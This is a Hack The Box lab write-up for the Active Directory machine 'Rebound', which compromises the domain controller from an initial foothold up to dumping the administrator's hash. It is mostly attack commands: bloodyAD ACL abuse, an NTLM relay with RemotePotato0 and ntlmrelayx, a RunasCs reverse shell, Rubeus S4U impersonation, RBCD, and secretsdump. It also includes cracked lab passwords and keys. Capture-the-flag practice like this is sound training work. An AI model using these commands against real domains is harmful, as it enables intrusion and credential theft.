🏀Rebound - HTB
https://app.hackthebox.com/machines/Rebound
FootHold
Enumerating exist users

GetUsersSPNs to grab their ticket with no-preauth user jjones

ldap_monitor user were cracked

ldap_monitor:1GR8t@$$4u
machine give error KRB_AP_ERR_SKEW(Clock skew too great)
after some googling i found this

synchronizing time with the domain time as kerberos is a time sensitive
Creating a TGT




after reviewing bloodhound
1- Add 'oorend' user to ServiceMgmt Group
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
2- Get FullControl on OU Service Users
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
3- Update winrm_svc password
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Ask1askaskask
or
rpcclient
setuserinfo2 winrm_svc 23 Ask1askaskask

Root#
first we need user tbrady
exploit RPC -> Ldap
https://github.com/antonioCoco/RemotePotato0
It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.
so this is what to do
1- setup a socat listener
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
2- setup a cross protocol relay <ntlmrelayx >se server
python3 ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc
3- execute RemotePotato.exe
.\RemotePotato.exe -m 2 -s 1 -r 10.10.14.15 -x 10.10.14.15 -p 9999

cracked it with hashcat -m 5600
tbrady : 543BOMBOMBUNmanda
we cant get a shell with this user ,but we can still use bloodAD
The user tbrady has the ability to read the GMSA password of the delegator$ GMSA
The delegator GMSA has constrained delegation configured over the DC

hash
aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3
getting a TGT for delegator$


uploading RunasCs.exe
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "cmd.exe /c whoami"
we are able to execute commands as user tbrady ,lets upload reverseshell and give permission to folder
icacls "C:\Users\winrm_svc\Documents" /grant:r "Everyone:(OI)(CI)F" /T
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\Users\winrm_svc\Documents\shell.exe"
now from tbrady shell we execute Rubeus to improsenate administrator ticker
.\Rubeus.exe s4u /user:delegator$ /aes256:9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b /domain:rebound.htb /impersonateuser:administrator /nowrap /ptt
ticket not yet imported so we copy the <base64> and insert it in another command to import it
.\Rubeus.exe ptt /ticket:<base64 ticket .........asdgb==>
Administrator TGT imported

can take the decrypted ticket from base64 and convert it to be imported locally

found out that /etc/hosts must be
10.10.11.231 dc01.rebound.htb dc01
configuring Kerberos ticket delegation from the 'ldap_monitor' service principal to the 'delegator$' service principal using LDAPS
python3 rbcd.py -aesKey 9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -debug -action write -delegate-from ldap_monitor
get ldap_monitor TGT
now impresonate dc01$
python3 getST.pu -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
export the new administrator TGT
python3 secretsdump.py -no -k dc01.rebound.htb -just-dc-user administrator

Last updated